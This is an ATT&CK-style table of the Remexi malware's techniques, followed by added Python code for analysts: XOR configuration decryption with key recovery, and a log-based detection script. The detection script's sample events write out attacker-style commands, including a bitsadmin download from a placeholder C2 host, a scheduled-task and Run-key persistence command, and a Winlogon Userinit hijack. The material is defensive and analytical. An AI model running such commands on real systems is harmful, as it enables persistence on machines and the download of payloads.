| Domain | ID | Name | Use |
|---|---|---|---|
| Enterprise | T1047 | Windows Management Instrumentation | Remexi executes received commands with wmic.exe (for WMI commands).[1] |
| Enterprise | T1115 | Clipboard Data | |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | Remexi decrypts the configuration data using XOR with 25-character keys.[1] |
| Enterprise | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | Remexi utilizes Run Registry keys in the HKLM hive as a persistence mechanism.[1] |
| Enterprise | T1547.004 | Boot or Logon Autostart Execution: Winlogon Helper DLL | Remexi achieves persistence using Userinit by adding the Registry key |
| Enterprise | T1059.003 | Command and Scripting Interpreter: Windows Command Shell | |
| Enterprise | T1059.005 | Command and Scripting Interpreter: Visual Basic | Remexi uses AutoIt and VBS scripts throughout its execution process.[1] |
| Enterprise | T1113 | Screen Capture | |
| Enterprise | T1071.001 | Application Layer Protocol: Web Protocols | Remexi uses BITSAdmin to communicate with the C2 server over HTTP.[1] |
| Enterprise | T1010 | Application Window Discovery | Remexi has a command to capture active windows on the machine and retrieve window titles.[1] |
| Enterprise | T1560 | Archive Collected Data | Remexi encrypts and adds all gathered browser data into files for upload to C2.[1] |
| Enterprise | T1083 | File and Directory Discovery | |
| Enterprise | T1027.013 | Obfuscated Files or Information: Encrypted/Encoded File | |
| Enterprise | T1056.001 | Input Capture: Keylogging | Remexi gathers and exfiltrates keystrokes from the machine.[1] |
| Enterprise | T1041 | Exfiltration Over C2 Channel | Remexi performs exfiltration over BITSAdmin, which is also used for the C2 channel.[1] |
| Enterprise | T1053.005 | Scheduled Task/Job: Scheduled Task | Remexi utilizes scheduled tasks as a persistence mechanism.[1] |
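The T1140 row states that the configuration is XOR-encrypted with a 25-character key. The following is an added example (not code from the ATT&CK page or from any Remexi sample) showing the decryption and the known-plaintext trick an analyst uses to recover such a key: because each ciphertext byte is plaintext XOR key, a fragment of known plaintext at a known offset gives back the key bytes at those positions. `DEMO_KEY` and `DEMO_CONFIG` are constructed for the demo and are not values from the malware.

```python
"""Added example: repeating-key XOR decoding of a configuration blob and
key recovery from a known plaintext fragment. Key and config are constructed."""

KEY_LEN = 25  # key length given in the T1140 row


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """XOR data against a repeating key. XOR is symmetric, so the same call
    both encrypts and decrypts."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_key(ciphertext: bytes, known_plaintext: bytes,
                offset: int = 0, key_len: int = KEY_LEN) -> bytes:
    """Recover a repeating XOR key from a known plaintext fragment located at
    `offset` in the ciphertext. ciphertext[i] ^ plaintext[i] yields the key
    byte at position i % key_len, so at least key_len bytes of known
    plaintext are needed to fill every key position."""
    if len(known_plaintext) < key_len:
        raise ValueError(f"need at least {key_len} bytes of known plaintext")
    if offset + len(known_plaintext) > len(ciphertext):
        raise ValueError("known plaintext runs past the end of the ciphertext")
    key = bytearray(key_len)
    for i, p in enumerate(known_plaintext):
        key[(offset + i) % key_len] = ciphertext[offset + i] ^ p
    return bytes(key)


def decrypt_config(blob: bytes, key: bytes) -> str:
    """Decrypt a config blob and decode it as text (latin-1 never fails)."""
    return xor_with_key(blob, key).decode("latin-1")


# Constructed demo material (assumption: an INI-like text config).
DEMO_KEY = b"Q7m!pL2zX9vK4sB1nC8rT6wY0"  # exactly 25 bytes
DEMO_CONFIG = (b"[config]\r\n"
               b"c2=http://c2.example.invalid/upload\r\n"
               b"interval=300\r\n"
               b"id=EXAMPLE-HOST\r\n")
DEMO_BLOB = xor_with_key(DEMO_CONFIG, DEMO_KEY)  # what an analyst would carve


if __name__ == "__main__":
    # An analyst who knows the file starts with "[config]\r\n..." can recover
    # the key from the first 25 bytes and then decrypt the whole blob.
    key = recover_key(DEMO_BLOB, DEMO_CONFIG[:KEY_LEN])
    print(decrypt_config(DEMO_BLOB, key))
```

A fragment shorter than 25 bytes only fills some key positions; in practice an analyst combines several known strings (headers, URL schemes, padding) at their respective offsets until all 25 positions are known.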
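Several rows above (T1047, T1071.001/T1041, T1053.005, T1547.001, T1547.004, T1059.005) describe behaviour that surfaces in process-creation telemetry. The following is an added example (not from the ATT&CK page or any Remexi sample) of detection rules run over constructed log lines; the JSON-per-line shape and the Sysmon-style field names `Image`, `CommandLine` and `ParentImage` are assumptions, as are the sample paths and commands.

```python
"""Added example: map process-creation events to the technique rows above.
Log format, field names and all sample events are constructed for the demo."""
import json
import re
from typing import Dict, List

# (technique id, lower-cased image basenames, command-line pattern or None)
RULES = [
    ("T1047", {"wmic.exe"}, None),
    ("T1071.001", {"bitsadmin.exe"},
     re.compile(r"/transfer\b.*https?://", re.I)),
    ("T1053.005", {"schtasks.exe"}, re.compile(r"/create\b", re.I)),
    ("T1547.001", {"reg.exe"},
     re.compile(r"\badd\b.*\\CurrentVersion\\Run(Once)?\b", re.I)),
    ("T1547.004", {"reg.exe"},
     re.compile(r"\badd\b.*\\Winlogon\b.*\bUserinit\b", re.I)),
    ("T1059.005", {"wscript.exe", "cscript.exe"},
     re.compile(r"\.(vbs|vbe)\b", re.I)),
]


def basename(path: str) -> str:
    """Last path component, lower-cased, tolerant of either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> List[str]:
    """Return the technique ids whose rule matches this event."""
    image = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    return [tid for tid, images, pattern in RULES
            if image in images and (pattern is None or pattern.search(cmd))]


def scan(lines) -> List[dict]:
    """Parse JSON-per-line events and collect one finding per rule hit."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        for tid in classify(event):
            findings.append({"technique": tid,
                             "image": basename(event.get("Image", "")),
                             "parent": basename(event.get("ParentImage", "")),
                             "cmd": event.get("CommandLine", "")})
    return findings


# Constructed sample events (paths and hostnames are placeholders).
SAMPLE_LOG = r"""
{"Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","CommandLine":"wmic process call create \"cmd.exe /c whoami\"","ParentImage":"C:\\Users\\u\\AppData\\Local\\Temp\\svc.exe"}
{"Image":"C:\\Windows\\System32\\bitsadmin.exe","CommandLine":"bitsadmin /transfer job /download /priority high http://c2.example.invalid/get C:\\Users\\u\\AppData\\Local\\Temp\\a.dat","ParentImage":"C:\\Users\\u\\AppData\\Local\\Temp\\svc.exe"}
{"Image":"C:\\Windows\\System32\\schtasks.exe","CommandLine":"schtasks /create /sc minute /mo 5 /tn Updater /tr C:\\Users\\u\\AppData\\Local\\Temp\\svc.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe"}
{"Image":"C:\\Windows\\System32\\reg.exe","CommandLine":"reg add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Updater /t REG_SZ /d C:\\Users\\u\\AppData\\Local\\Temp\\svc.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe"}
{"Image":"C:\\Windows\\System32\\reg.exe","CommandLine":"reg add \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v Userinit /t REG_SZ /d \"C:\\Windows\\system32\\userinit.exe,C:\\Users\\u\\AppData\\Local\\Temp\\svc.exe\"","ParentImage":"C:\\Windows\\System32\\cmd.exe"}
{"Image":"C:\\Windows\\System32\\wscript.exe","CommandLine":"wscript.exe C:\\Users\\u\\AppData\\Local\\Temp\\run.vbs","ParentImage":"C:\\Windows\\System32\\cmd.exe"}
{"Image":"C:\\Windows\\explorer.exe","CommandLine":"explorer.exe","ParentImage":"C:\\Windows\\System32\\userinit.exe"}
{"Image":"C:\\Windows\\System32\\bitsadmin.exe","CommandLine":"bitsadmin /list","ParentImage":"C:\\Windows\\System32\\cmd.exe"}
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f["technique"], f["image"], "<-", f["parent"], "|", f["cmd"])
```

The rules are deliberately narrow (a `bitsadmin /list` or a `reg query` does not fire) so the output is reviewable; in a real deployment the parent process and the path of the scheduled task or Run-key target (user-writable directories such as `%TEMP%`) are the fields worth adding to the score.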